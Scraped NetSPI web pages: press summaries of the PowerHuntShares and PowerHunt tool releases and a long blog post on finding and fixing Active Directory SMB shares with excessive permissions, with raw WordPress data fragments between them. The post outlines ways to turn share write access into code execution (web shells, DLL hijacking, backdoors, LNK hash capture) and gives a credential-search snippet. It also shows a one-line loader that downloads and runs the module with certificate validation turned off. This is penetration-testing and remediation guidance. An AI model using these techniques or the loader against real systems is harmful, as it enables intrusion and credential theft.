On August 9, NetSPI Senior Director Scott Sutherland was featured in the Database Trends and Applications article called NetSPI’s Latest Open-Source Tools Confront Information Security Issues. Read the preview below or view it online.

+++

NetSPI, an enterprise penetration testing and attack surface management company, is releasing two new open-source tools for identity and access management (IAM) and security operations center (SOC) groups. These tools, PowerHuntShares and PowerHunt, will help information security teams discover vulnerable network shares and improve detections overall.

PowerHuntShares aims to alleviate the pains of data exposure, privilege escalation, and ransomware attacks in company systems caused by excessive privileges. The tool inventories, analyzes, and reports excessive share permissions associated with their respective SMB shares on Active Directory domain-joined computers.

PowerHunt is a modular threat hunting framework that locates risks across target environments and identifies target-specific anomalies and outliers. Detection is based on artifacts from prevalent MITRE ATT&CK techniques, the collection of which is automated using PowerShell remoting, followed by initial analysis. PowerHunt also produces easy-to-consume .csv files to support additional triage and analysis with other tools and processes.

“I’m proud to work for an organization that understands the importance of open-source tool development and encourages innovation through collaboration,” said Scott Sutherland, senior director at NetSPI. “I urge the security community to check out and contribute to these tools so we can better understand our SMB share attack surfaces and improve strategies for remediation, together.”

For more information, please visit https://www.netspi.com/.

[post_title] => Database Trends and Applications: NetSPI’s Latest Open-Source Tools Confront Information Security Issues [post_excerpt] => On August 9, NetSPI Senior Director Scott Sutherland was featured in the Database Trends and Applications called NetSPI’s Latest Open-Source Tools Confront Information Security Issues. Read the preview below or view it online. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => open-source-tools-confront-information-security-issues [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:22 [post_modified_gmt] => 2023-01-23 21:10:22 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28196 [menu_order] => 104 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [11] => WP_Post Object ( [ID] => 28193 [post_author] => 17 [post_date] => 2022-08-09 12:21:00 [post_date_gmt] => 2022-08-09 17:21:00 [post_content] =>

On August 9, NetSPI Senior Director Scott Sutherland was featured in the VentureBeat article called NetSPI rolls out 2 new open-source pen-testing tools at Black Hat. Read the preview below or view it online.

+++

Preventing and mitigating cyberattacks is a day-to-day — sometimes hour-to-hour — endeavor for enterprises. New, more advanced techniques are revealed constantly, especially with the rise in ransomware-as-a-service, crime syndicates and cybercrime commoditization. Likewise, statistics are seemingly endless, with a regular churn of new, updated reports and research studies revealing worsening conditions. 

According to Fortune Business Insights, the worldwide information security market will reach roughly $376 billion by 2029. And IBM research revealed that the average cost of a data breach is $4.35 million.

The harsh truth is that many organizations are exposed due to common software, hardware or organizational process vulnerabilities — and 93% of all networks are open to breaches, according to another recent report.

Cybersecurity must therefore be a team effort, said Scott Sutherland, senior director at NetSPI, which specializes in enterprise penetration testing and attack-surface management. 

New open-source discovery and remediation tools

The company today announced the release of two new open-source tools for the information security community: PowerHuntShares and PowerHunt. Sutherland is demoing both at Black Hat USA this week. 

These new tools are aimed at helping defense, identity and access management (IAM) and security operations center (SOC) teams discover vulnerable network shares and improve detections, said Sutherland. 

They have been developed — and released in an open-source capacity — to “help ensure our penetration testers and the IT community can more effectively identify and remediate excessive share permissions that are being abused by bad actors like ransomware groups,” said Sutherland. 

He added, “They can be used as part of a regular quarterly cadence, but the hope is they’ll be a starting point for companies that lacked awareness around these issues before the tools were released.” 

Vulnerabilities revealed (by the good guys)

The new PowerHuntShares capability inventories, analyzes and reports excessive privilege assigned to server message block (SMB) shares on Microsoft’s Active Directory (AD) domain-joined computers. 

SMB allows applications on a computer to read and write to files and to request services from server programs in a computer network.

NetSPI’s new tool helps address risks of excessive share permissions in AD environments that can lead to data exposure, privilege escalation and ransomware attacks within enterprise environments, explained Sutherland. 

“PowerHuntShares is focused on identifying shares configured with excessive permissions and providing data insight to understand how they are related to each other, when they were introduced into the environment, who owns them and how exploitable they are,” said Sutherland. 

For instance, according to a recent study from cybersecurity company ExtraHop, SMB was the most prevalent protocol exposed in many industries: 34 out of 10,000 devices in financial services; seven out of 10,000 devices in healthcare; and five out of 10,000 devices in state, local and education (SLED).

You can read the full article at VentureBeat!

[post_title] => VentureBeat: NetSPI rolls out 2 new open-source pen-testing tools at Black Hat [post_excerpt] => On August 9, NetSPI Senior Director Scott Sutherland was featured in the VentureBeat article called NetSPI rolls out 2 new open-source pen-testing tools at Black Hat. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => venturebeat-new-open-source-pentesting-tools [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:23 [post_modified_gmt] => 2023-01-23 21:10:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28193 [menu_order] => 105 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [12] => WP_Post Object ( [ID] => 28175 [post_author] => 17 [post_date] => 2022-08-09 08:00:00 [post_date_gmt] => 2022-08-09 13:00:00 [post_content] =>

Introduction 

In this blog, I’ll explain how to quickly inventory, exploit, and remediate network shares configured with excessive permissions at scale in Active Directory environments. Excessive share permissions represent a risk that can lead to data exposure, privilege escalation, and ransomware attacks within enterprise environments. So, I’ll also be exploring why network shares configured with excessive permissions are still plaguing most environments after 20 years of mainstream vulnerability management and penetration testing.

Finally, I’ll share a new open-source tool called PowerHuntShares that can help streamline share hunting and remediation of excessive SMB share permissions in Active Directory environments. This content is also available in a presentation format here. Or, if you’d like to hear me talk about this topic, check out our webinar, How to Evaluate Active Directory SMB Shares at Scale.

This should be interesting to people responsible for managing network share access in Active Directory environments (Identity and access management/IAM teams) and the red team/penetration testers tasked with exploiting that access. 

TLDR; We can leverage Active Directory to help create an inventory of systems and shares. Shares configured with excessive permissions can lead to remote code execution (RCE) in a variety of ways, remediation efforts can be expedited through simple data grouping techniques, and malicious share scanning can be detected with a few common event IDs and a little correlation (always easier said than done).

Table of Contents: 

The Problem(s)
Network Share Permissions Inheritance Blind Spots
Network Share Inventory
Network Share Exploitation
Network Share Remediation
Introducing PowerHuntShares
Wrap Up

The Problem(s) 

If only it were just one problem. I don’t know a penetration tester that doesn’t have a war story involving unauthorized network share access. In the real world, that story typically ends with the deployment of ransomware and double extortion. That’s why it’s important we try to understand some of the root causes behind this issue. Below is a summary of the root causes that often lead to massive network share exposure in most Active Directory environments. 

Broken Asset Management 

Tracking live systems in enterprise environments is difficult, and tracking an ever-changing share inventory and its owners is even more difficult. Even if the Identity and Access Management (IAM) team finds a network share through discovery, it raises the questions:

  1. Who owns it?
  2. What applications or business processes does it support?
  3. Can we remove high risk Access Control Entries (ACE)?
  4. Can we remove the share altogether?

Most of those questions can be answered if you have a functioning Configuration Management Database (CMDB). Unfortunately, not everyone does.

Broken Vulnerability Management 

Many vulnerability management programs were never built to identify network share configurations that provide unauthorized access to authenticated domain users. Much of their focus has been on identifying classic vulnerabilities (missing patches, weak passwords, and application issues) and prioritizing efforts around vulnerabilities that don’t require authentication, which is of course not all bad.

However, based on my observations, the industry has only taken a deep interest in the Active Directory ecosystem in the last five years. This seems to be largely due to increased exposure and awareness of Active Directory (AD) attacks which are heavily dependent on configurations and not missing patches.

I’m also not saying IAM teams haven’t been working hard to do their jobs, but in many cases, they get bogged down in what equates to group management and forget to (or don’t have time to) look at the actual assets that global/common groups have access to. That is a deep well, but today’s focus is on the network shares.

Penetration testers have always known shares are a risk, but implementing, managing, and evaluating least privilege in Active Directory environments is a non-trivial challenge. Even with increased interest in the security community, very few solutions can effectively inventory and evaluate share access for an entire Active Directory domain (or multiple domains). 

Based on my experience, very few organizations perform authenticated vulnerability scans to begin with, but even those that do seem to lack findings for common excessive privileges, inherited permissions, and distilled summary data for the environment that provides the insights that most IAM teams need to make good decisions. There has been an overreliance on those types of tools for a long time because many companies have the impression that they provide more coverage than they do regarding network share permissions. 

In short, good asset inventory and attack surface management paves the way for better vulnerability management coverage – and many companies aren’t quite there yet. 

Not Considering Segmentation Boundaries 

Most large environments have host, network, and Active Directory domain boundaries that need to be considered when performing any type of authenticated scanning or agent deployment. Companies trying to accurately inventory and evaluate network shares often miss things because they do not consider the boundaries isolating their assets. Make sure to work within those boundaries when evaluating assets. 

The Cloud is Here!

The cloud is here, and it supports all kinds of fantastic file storage mediums, but that doesn’t mean that on premise network shares disappear. Companies need to make sure they are still looking backward as they continue to look forward regarding security controls on file shares. For many companies, it may be the better part of a decade before they can migrate the bulk of their file storage infrastructure into their favorite floating mass of condensed water vapor – you know, the cloud. 😜

Misunderstanding NTFS and Share Permissions 

There are a lot of bad practices related to share permission management that have gotten absorbed into IT culture over the years simply because people don’t understand how they work. One of the biggest contributors to excessive share permissions is privilege inheritance through native nested group memberships. This issue is not limited to network shares either. We have been abusing the same privilege inheritance issues for over a decade to get access to SQL Server Instances. In the next sections, I’ll provide an overview of the issue and how it can be exploited in the context of network shares.

Network Share Permissions Inheritance Blind Spots 

A network share is just a medium for making local files available to remote users on the network, but two sets of permissions control a remote user’s access to the shared files. To understand the privilege inheritance problem, it helps to do a quick refresher on how NTFS and share permissions work together on Windows systems. Let’s explore the basics. 

NTFS Permissions 

  • Used to control access to the local NTFS file system 
  • Can affect local and remote users 

Share Permissions 

  • Used to control access to shared files and folders 
  • Only affects remote users 

In short, from a remote user perspective, network share permissions (remote) are reviewed first, then NTFS permissions (local) are reviewed second, but the most restrictive permission always wins regardless. Below is a simple example showing that John has Full Control permissions on the share, but only Read permissions on the associated local folder. Most restrictive wins, so John is only provided read access to the files made available remotely through the shared folder.

A diagram of NTFS Permissions and Share Permissions showcasing that the most restrictive permission wins.
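If you want to compare the two permission sets yourself, below is a minimal PowerShell sketch that pulls the share ACL and the underlying NTFS ACL for a single share so they can be reviewed side by side. The share name is illustrative, and it assumes you have rights to read both.

# Sketch: compare share permissions vs. NTFS permissions for one share
# (the share name "files" is illustrative)
$Share = Get-SmbShare -Name "files"

# Share permissions (only affect remote users)
Get-SmbShareAccess -Name $Share.Name | Select-Object Name, AccountName, AccessControlType, AccessRight

# NTFS permissions on the backing folder (affect local and remote users)
(Get-Acl -Path $Share.Path).Access | Select-Object IdentityReference, AccessControlType, FileSystemRights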

So those are the basics. The big idea being that the most restrictive ACL wins. However, there are some nuances that have to do with local groups that inherit Domain Groups. To get our heads around that, let’s touch briefly on the affected local groups. 

Everyone

The everyone group provides all authenticated and anonymous users with access in most configurations. This group is overused in many environments and often results in excessive privilege. 

Builtin\Users 

New local users are added to this group by default. When the system is not joined to a domain, it behaves as you would expect.

Authenticated Users

This group is nested in the Builtin\Users group. When a system is not joined to the domain, it doesn’t do much in the way of influencing access. However, when a system is joined to an Active Directory domain, Authenticated Users implicitly includes the “Domain Users” and “Domain Computers” groups. For example, an IT administrator may think they’re only providing remote share access to the Builtin\Users group, when in fact they are giving it to everyone on the domain. Below is a diagram to help illustrate this scenario.

Builtin\Users group includes Domain Users when domain joined.
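You can sanity check that nesting on a domain-joined system with a couple of built-in commands. This is a minimal sketch; the exact membership output will vary by environment and OS version.

# Show the members of the local Users group; on domain-joined systems it
# typically contains NT AUTHORITY\Authenticated Users, which implicitly
# includes Domain Users and Domain Computers
net localgroup Users

# Show the groups in the current user's access token, including Authenticated Users
whoami /groups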

The lesson here is that a small misunderstanding around local and domain group relationships can lead to unauthorized access and potential risk. The next section will cover how to inventory shares and their Access-Control Lists (ACLs) so we can target and remediate them.

Network Share Inventory 

As it turns out, getting a quick inventory of your domain computers and associated shares isn’t that hard thanks to several native and open-source tools. The trick is to grab enough information to answer those who, what, where, when, and how questions needed for remediation efforts.
The discovery of shares and permissions boils down to a few basic steps: 

  1. Query Active Directory via Lightweight Directory Access Protocol (LDAP) to get a list of domain computers. PowerShell commands like Get-AdComputer (Active Directory PowerShell Module) and Get-DomainComputer (PowerSploit) can help a lot there.
  2. Confirm connectivity to those computers on TCP port 445. Nmap is a free and easy-to-use tool for this purpose. There are also several open-source TCP port scanning scripts out there if you want to stick with PowerShell.
  3. Query for shares, share permissions, and other information using your preferred method. PowerShell tools like Get-SMBShare, Get-SmbShareAccess, Get-ACL, and Get-ObjectAcl (PowerSploit) are quite helpful.
  4. Other information that will help remediation efforts later includes the folder owner, file count, file listing, file listing hash, and computer IP address. You may also find some of that information in your company’s CMDB. PowerShell commands like Get-ChildItem and Resolve-DnsName can also help gather some of that information. (A sketch tying the first three steps together follows this list.)
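
To make that concrete, below is a minimal sketch that ties steps 1 through 3 together using the RSAT Active Directory module and PowerShell remoting. It assumes the module is installed, remoting is enabled on the targets, and your account has rights to query them.

# Sketch: rough SMB share inventory across domain computers
Import-Module ActiveDirectory

# Step 1: Pull the computer list from Active Directory via LDAP
$Computers = Get-ADComputer -Filter * | Select-Object -ExpandProperty DNSHostName

foreach ($Computer in $Computers) {

    # Step 2: Confirm TCP port 445 is reachable
    $Open = (Test-NetConnection -ComputerName $Computer -Port 445 -WarningAction SilentlyContinue).TcpTestSucceeded
    if ($Open) {

        # Step 3: Enumerate shares and share permissions remotely
        Invoke-Command -ComputerName $Computer -ScriptBlock {
            Get-SmbShare | ForEach-Object {
                Get-SmbShareAccess -Name $_.Name |
                    Select-Object @{n='ComputerName';e={$env:COMPUTERNAME}}, Name, AccountName, AccessRight
            }
        }
    }
}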

PowerHuntShares can be used to automate the tasks above (covered in the last section), but regardless of what you use for discovery, understanding how unauthorized share access can be abused will help your team prioritize remediation efforts.

Network Share Exploitation 

Network shares configured with excessive permissions can be exploited in several ways, but the nature of the share and specific share permissions will ultimately dictate which attacks can be executed. Below, I’ve provided an overview of some of the most common attacks that leverage read and write access to shares to help get you started. 

Read Access Abuse 

Ransomware and other threat actors often leverage excessive read permissions on shares to access sensitive data like Personal Identifiable Information (PII) or intellectual property (source code, engineering designs, investment strategies, proprietary formulas, acquisition information, etc.) that they can exploit, sell, or extort your company with. Additionally, we have found during penetration tests that passwords are commonly stored in cleartext and can be used to log into databases and servers. This means that in some cases, read access to a share can end in RCE.

Below is a simple example of how excessive read access to a network share can result in RCE: 

  1. The attacker compromises a domain user.
  2. The attacker identifies a shared folder for a web root, code backup, or dev ops directory.
  3. The attacker identifies passwords (often database connection strings) stored in cleartext.
  4. The attacker uses the database password to connect to the database server.
  5. The attacker uses the native database functionality to obtain local administrative privileges to the database server’s operating system.
  6. The attacker leverages the shared database service account to access other database servers. 

Below is a simple illustration of that process: 

A 6-step process of how excessive read access to a network share can result in remote code execution (RCE).
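Step 3 often comes down to simple keyword searches. Below is a minimal sketch for hunting cleartext credentials on a readable share; the UNC path, file extensions, and keywords are all illustrative.

# Sketch: search a readable share for cleartext credentials
# (\\server1\backup and the extension list are illustrative)
Get-ChildItem -Path \\server1\backup -Recurse -Include *.config,*.xml,*.ps1,*.txt -ErrorAction SilentlyContinue |
    Select-String -Pattern 'password\s*=','connectionstring' |
    Select-Object Path, LineNumber, Line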

Write Access Abuse 

Write access provides all the benefits of read access with the bonus of being able to add, remove, modify, and encrypt files (like Ransomware threat actors). Write access also offers more potential to turn share access into RCE. Below is a list of ten of the more common RCE options: 

  1. Write a web shell to a web root folder, which can be accessed via the web server.
  2. Replace or modify application EXE and DLL files to include a backdoor.
  3. Write EXE or DLL files to paths used by applications and services that are unquoted.
  4. Write a DLL to application folders to perform DLL hijacking. You can use Koppeling, written by NetSPI’s very own Director of Research Nick Landers.
  5. Write a DLL and config file to application folders to perform appdomain hijacking for .net applications.
  6. Write an executable or script to the “All Users” Startup folder to launch them at the next logon.
  7. Modify files executed by scheduled tasks.
  8. Modify the PowerShell startup profile to include a backdoor.
  9. Modify Microsoft Office templates to include a backdoor.
  10. Write a malicious LNK file to capture or relay the NetNTLM hashes. 

You may have noticed that many of the techniques I listed are also commonly used for persistence and lateral movement, which is a great reminder that old techniques can have more than one use case. 
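Before choosing any of those options, it helps to confirm which shares actually allow writes. Below is a minimal sketch that tests write access by creating and then deleting a harmless file; the share names are illustrative.

# Sketch: quick write-access test against discovered shares
# (share names are illustrative)
$Shares = @('\\server1\wwwroot', '\\server1\c$')
foreach ($Share in $Shares) {
    # Use a random file name to avoid clobbering existing files
    $TestFile = Join-Path $Share ([guid]::NewGuid().ToString() + '.txt')
    try {
        Set-Content -Path $TestFile -Value 'write test' -ErrorAction Stop
        Remove-Item -Path $TestFile -ErrorAction SilentlyContinue
        "$Share is writable"
    } catch {
        "$Share is not writable"
    }
}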

Below is a simple diagram that attempts to illustrate the basic web shell example.

  1. The attacker compromises a domain user.
  2. The attacker scans for shares, finds a wwwroot directory, and uploads a web shell. The wwwroot directory stores all the files used by the web application hosted on the target IIS server. So, you can think of the web shell as something that extends the functionality of the published web application.
  3. Using a standard web browser, the attacker can now access the uploaded web shell file hosted by the target IIS web server.
  4. The attacker uses the web shell access to execute commands on the operating systems as the web server service account.
  5. The web server service account may have additional privileges to access other resources on the network.
A 5-step diagram showing RCE using a web shell.

Below is another simplified diagram showing the generic steps that can be used to execute the attacks from my top 10 list. Let’s pay attention to the C$ share being abused. The C$ share is a default hidden share in Windows that should not be accessible to standard domain users. It maps to the C drive, which typically includes all the files on the system. Unfortunately, devOops, application deployments, and single user misconfigurations accidentally (or intentionally) make the C$ share available to all domain users in more environments than you might think. During our penetration tests, we perform full SMB share audits for domain-joined systems, and we have found that we end up with write access to a C$ share more than half the time.

A simplified diagram based on the list of 10 common remote code execution (RCE) options.

Network Share Remediation 

Tracking down system owners, applications, and valid business cases during excessive share remediation efforts can be a huge pain for IAM teams. For a large business, it can mean sorting through hundreds of thousands of share ACLs. So having ways to group and prioritize shares during that effort can be a huge time saver. 

I’ve found that the trick to successful grouping is collecting the right data. To determine what data to collect, I ask myself the standard who, what, where, when, and how questions and then determine where I may be able to get that data from there. 

What shares are exposed? 

  • Share Name: Sometimes, the share name alone can indicate the type of data exposed including high risk shares like C$, ADMIN$, and wwwroot.
  • Share File Count: The number of files in a share can help you prioritize remediation; for example, empty shares can often be deprioritized or simply removed when you are trying to address high-risk shares first.
  • Directory List: Similar to share name, the folders and files in a shared directory can often tell you a lot about context.
  • Directory List Hash: This is simply a hash of the directory listing. While not a hard requirement, it can make identifying and comparing directory listings that are the same a little easier. 

Who has access to them? 

  • Share ACL: This will help show what access users have and can be filtered for known high-risk groups or large internal groups.
  • NTFS ACL: This will help show what access users have and can be filtered for known high-risk groups or large internal groups. 

When were they created? 

  • Folder Creation Date: Grouping or clustering creation dates on a timeline can reveal trends that can be tied to business units, applications, and processes that may have introduced excessive share privileges in the past. 

Who created them? 

  • Folder Owner: The folder owner can sometimes lead you to the department or business unit that owns the system, application, or process that created/uses the share.
  • Hostname: Hostname can indicate location and ownership if standardized naming conventions are used. 

Where are they? 

  • Computer Name: The name of the computer hosting the share can often be used to determine a lot of information, like department and location, if a standardized naming convention is used.
  • IP Address: Similar to computer names, subnets are also commonly allocated to computers that do specific things. In many environments, that allocation is documented in Active Directory and can be cross referenced. 

If we collect all of that information during discovery, we can use it to perform grouping based on share name, owner, subnet, folder list, and folder list hash so we can identify large chunks of related shares that can be remediated at once. Don’t want to write the code for that yourself? I wrote PowerHuntShares to help you out.
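If you do want to roll your own analysis first, the grouping itself is straightforward once the inventory is in a CSV. Below is a minimal sketch; the file path and column names are illustrative and will depend on how you exported your data.

# Sketch: group a share inventory by directory listing hash to find remediation clusters
# (file path and column names are illustrative)
$Shares = Import-Csv 'C:\temp\share-inventory.csv'
$Shares | Group-Object FileListHash |
    Sort-Object Count -Descending |
    Select-Object -First 10 Count, @{n='ShareName';e={$_.Group[0].ShareName}}, @{n='Owner';e={$_.Group[0].ShareOwner}}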

Introducing PowerHuntShares 

PowerHuntShares is designed to automatically inventory, analyze, and report excessive privilege assigned to SMB shares on Active Directory domain joined computers. It is intended to be used by IAM and other security teams to gain a better understanding of their SMB Share attack surface and provide data insights to help group and prioritize share remediation efforts. Below is a quick guide to PowerHuntShares setup, execution (collection & analysis), and reporting. 

Setup 

1. Download the project from https://github.com/NetSPI/Powerhuntshares.

2. From a non-domain joined system, you can load it with the following commands:

runas /netonly /user:domain\user PowerShell.exe
Set-ExecutionPolicy bypass -scope process
Import-Module .\PowerHuntShares.psm1

Alternatively, you can load it directly from the internet using the following PowerShell script. 

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerHuntShares/main/PowerHuntShares.psm1")

Collection

The Invoke-HuntSMBShares collection function wraps a few modified functions from PowerView and Invoke-Parallel. The modifications grab additional information, automate common task sequences, and generate summary data for the reports. Regardless, a big shout out for the nice work done by Warren F. and Will Schroeder (however long ago). Below are some command examples. 

Run from domain joined system:

Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test

Run from a non-domain joined system:

runas /netonly /user:domain\user PowerShell.exe
Invoke-HuntSMBShares -Threads 100 -RunSpaceTimeOut 10 `
-OutputDirectory c:\folder\ `
-DomainController 10.1.1.1 `
-Credential domain\user
=============================================================== 
PowerHuntShares
=============================================================== 
 This function automates the following tasks:

 o Determine current computer's domain
 o Enumerate domain computers
 o Filter for computers that respond to ping requests
 o Filter for computers that have TCP 445 open and accessible
 o Enumerate SMB shares
 o Enumerate SMB share permissions
 o Identify shares with potentially excessive privileges
 o Identify shares that provide reads & write access
 o Identify shares that are high risk
 o Identify common share owners, names, & directory listings
 o Generate creation, last written, & last accessed timelines
 o Generate html summary report and detailed csv files

 Note: This can take hours to run in large environments.
---------------------------------------------------------------
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
---------------------------------------------------------------
SHARE DISCOVERY
--------------------------------------------------------------- 
[*][03/01/2021 09:35] Scan Start
[*][03/01/2021 09:35] Output Directory: c:\temp\smbshares\SmbShareHunt-03012021093504
[*][03/01/2021 09:35] Successful connection to domain controller: dc1.demo.local
[*][03/01/2021 09:35] Performing LDAP query for computers associated with the demo.local domain
[*][03/01/2021 09:35] - 245 computers found
[*][03/01/2021 09:35] Pinging 245 computers
[*][03/01/2021 09:35] - 55 computers responded to ping requests.
[*][03/01/2021 09:35] Checking if TCP Port 445 is open on 55 computers
[*][03/01/2021 09:36] - 49 computers have TCP port 445 open.
[*][03/01/2021 09:36] Getting a list of SMB shares from 49 computers
[*][03/01/2021 09:36] - 217 SMB shares were found.
[*][03/01/2021 09:36] Getting share permissions from 217 SMB shares
[*][03/01/2021 09:37] - 374 share permissions were enumerated.
[*][03/01/2021 09:37] Getting directory listings from 33 SMB shares
[*][03/01/2021 09:37] - Targeting up to 3 nested directory levels
[*][03/01/2021 09:37] - 563 files and folders were enumerated.
[*][03/01/2021 09:37] Identifying potentially excessive share permissions
[*][03/01/2021 09:37] - 33 potentially excessive privileges were found across 12 systems.
[*][03/01/2021 09:37] Scan Complete
--------------------------------------------------------------- 
SHARE ANALYSIS
--------------------------------------------------------------- 
[*][03/01/2021 09:37] Analysis Start
[*][03/01/2021 09:37] - 14 shares can be read across 12 systems.
[*][03/01/2021 09:37] - 1 shares can be written to across 1 systems.
[*][03/01/2021 09:37] - 46 shares are considered non-default across 32 systems.
[*][03/01/2021 09:37] - 0 shares are considered high risk across 0 systems
[*][03/01/2021 09:37] - Identified top 5 owners of excessive shares.
[*][03/01/2021 09:37] - Identified top 5 share groups.
[*][03/01/2021 09:37] - Identified top 5 share names.
[*][03/01/2021 09:37] - Identified shares created in last 90 days.
[*][03/01/2021 09:37] - Identified shares accessed in last 90 days.
[*][03/01/2021 09:37] - Identified shares modified in last 90 days.
[*][03/01/2021 09:37] Analysis Complete
--------------------------------------------------------------- 
SHARE REPORT SUMMARY
--------------------------------------------------------------- 
[*][03/01/2021 09:37] Domain: demo.local
[*][03/01/2021 09:37] Start time: 03/01/2021 09:35:04
[*][03/01/2021 09:37] End time: 03/01/2021 09:37:27
[*][03/01/2021 09:37] Run time: 00:02:23.2759086
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] COMPUTER SUMMARY
[*][03/01/2021 09:37] - 245 domain computers found.
[*][03/01/2021 09:37] - 55 (22.45%) domain computers responded to ping.
[*][03/01/2021 09:37] - 49 (20.00%) domain computers had TCP port 445 accessible.
[*][03/01/2021 09:37] - 32 (13.06%) domain computers had shares that were non-default.
[*][03/01/2021 09:37] - 12 (4.90%) domain computers had shares with potentially excessive privileges.
[*][03/01/2021 09:37] - 12 (4.90%) domain computers had shares that allowed READ access.
[*][03/01/2021 09:37] - 1 (0.41%) domain computers had shares that allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) domain computers had shares that are HIGH RISK.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] SHARE SUMMARY
[*][03/01/2021 09:37] - 217 shares were found. We expect a minimum of 98 shares
[*][03/01/2021 09:37]   because 49 systems had open ports and there are typically two default shares.
[*][03/01/2021 09:37] - 46 (21.20%) shares across 32 systems were non-default.
[*][03/01/2021 09:37] - 14 (6.45%) shares across 12 systems are configured with 33 potentially excessive ACLs.
[*][03/01/2021 09:37] - 14 (6.45%) shares across 12 systems allowed READ access.
[*][03/01/2021 09:37] - 1 (0.46%) shares across 1 systems allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) shares across 0 systems are considered HIGH RISK.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] SHARE ACL SUMMARY
[*][03/01/2021 09:37] - 374 ACLs were found.
[*][03/01/2021 09:37] - 374 (100.00%) ACLs were associated with non-default shares.
[*][03/01/2021 09:37] - 33 (8.82%) ACLs were found to be potentially excessive.
[*][03/01/2021 09:37] - 32 (8.56%) ACLs were found that allowed READ access.
[*][03/01/2021 09:37] - 1 (0.27%) ACLs were found that allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) ACLs were found that are associated with HIGH RISK share names.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] - The 5 most common share names are:
[*][03/01/2021 09:37] - 9 of 14 (64.29%) discovered shares are associated with the top 5 share names.
[*][03/01/2021 09:37]   - 4 backup
[*][03/01/2021 09:37]   - 2 ssms
[*][03/01/2021 09:37]   - 1 test2
[*][03/01/2021 09:37]   - 1 test1
[*][03/01/2021 09:37]   - 1 users
[*] ----------------------------------------------- 

Analysis

PowerHuntShares will inventory SMB share ACLs configured with "excessive privileges" and highlight "high risk" ACLs. Below is how those are defined in this context.

Excessive Privileges 

Excessive read and write share permissions have been defined as any network share ACL containing an explicit ACE (Access Control Entry) for the "Everyone", "Authenticated Users", "BUILTIN\Users", "Domain Users", or "Domain Computers" groups. They all provide domain users access to the affected shares due to privilege inheritance issues.
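Put differently, any ACE granted to one of those five identities gets flagged. Below is a minimal sketch of that check against imported ACL data; the variable and property names are illustrative.

# Sketch: flag ACEs granted to groups that implicitly include all domain users
# ($Acls is assumed to hold imported ACL records with an IdentityReference column)
$Acls | Where-Object { $_.IdentityReference -match 'Everyone|Authenticated Users|BUILTIN\\Users|Domain Users|Domain Computers' }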

High Risk Shares 

In the context of this report, high-risk shares have been defined as shares that provide unauthorized remote access to a system or application. By default, that includes wwwroot, inetpub, c, and c$ shares. However, additional exposures may exist that are not called out beyond that.

Reporting

The script will produce an HTML report along with supporting .csv and .html data files.

HTML Report 

The HTML report should have links to all the content. Below is a quick screenshot of the dashboard. It includes summary data at the computer, share, and share ACL level. It also has a fun share creation timeline so you can identify those share creation clusters mentioned earlier. It was my first attempt at generating that type of HTML/CSS with PowerShell, so while it could be better, at least it is a functional first try. 😊 It also includes data grouping summaries in the “data insights” section. 
 
Note: The data displayed in the creation timeline chart seems to be trustworthy, but the last accessed/modified timeline charts seem to be a little less dependable. I believe it has something to do with how they are used by the OS, but that is a research project for another day. 

A screenshot of the Powerhunt Shares dashboard. Includes summary data at the computer, share, and share ACL level.
CSV Files

The Invoke-HuntSMBShares script will generate all kinds of .csv files, but the primary file of interest will be the “Inventory-Excessive-Privileges.csv” file. It should contain all the data discussed earlier in this blog and can be a good source of data for additional offline analysis.

A detailed screenshot of the Inventory-Excessive-Privileges.csv generated by the Invoke-HuntSMBShares script.

PowerShell can be used to import the .csv files and do additional analysis on the spot, which can be handy from both the blue and red team perspectives.

A screenshot detailing how PowerShell can be used to import .csv files for additional analysis.
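As an example, the minimal sketch below imports the inventory and surfaces writable entries first; the file path and column names are illustrative and may differ between versions of the tool.

# Sketch: import the excessive-privileges inventory and filter for writable entries
# (file path and column names are illustrative)
$Privs = Import-Csv 'C:\temp\smbshares\Inventory-Excessive-Privileges.csv'
$Privs | Where-Object { $_.FileSystemRights -match 'Write|FullControl' } |
    Sort-Object ComputerName |
    Format-Table ComputerName, ShareName, IdentityReference, FileSystemRights -AutoSize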

Wrap Up

This was a fun blog to write, and we covered a lot of ground, so below is a quick recap:

  • IAM and red teams can leverage Active Directory to help create an inventory of systems, shares, and share permissions.
  • Remediation efforts can be expedited through simple data grouping techniques if the correct information is collected when creating your share inventory.
  • The builtin\users group implicitly includes domain users when joined to Active Directory domains through a group inheritance chain.
  • Shares configured with excessive permissions can lead to RCE in various ways.
  • Windows event IDs can be used to identify authenticated scanning (540, 4624, 680, 4625) and share access (5140) happening in your environment; see the sketch after this list.
  • PowerHuntShares is an open-source tool that can be used to get you started.
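As a starting point for the event ID correlation mentioned above, below is a minimal sketch that summarizes share-access events (ID 5140) by account. It assumes file share auditing is enabled on the host, and the property index used for the account name may vary by OS version.

# Sketch: summarize network share access events (ID 5140) by account
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 5140 } -MaxEvents 1000 |
    # Group by the subject account; property index 1 is typically SubjectUserName
    Group-Object { $_.Properties[1].Value } |
    Sort-Object Count -Descending |
    Select-Object -First 10 Count, Name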

In the long term, my hope is to rewrite PowerHuntShares in C# to improve performance and remove some of the bugs. Hopefully, the information shared in this blog helped generate some awareness of the issues surrounding excessive permissions assigned to SMB shares in Active Directory environments. Or at least serves as a place to start digging into the solutions. 

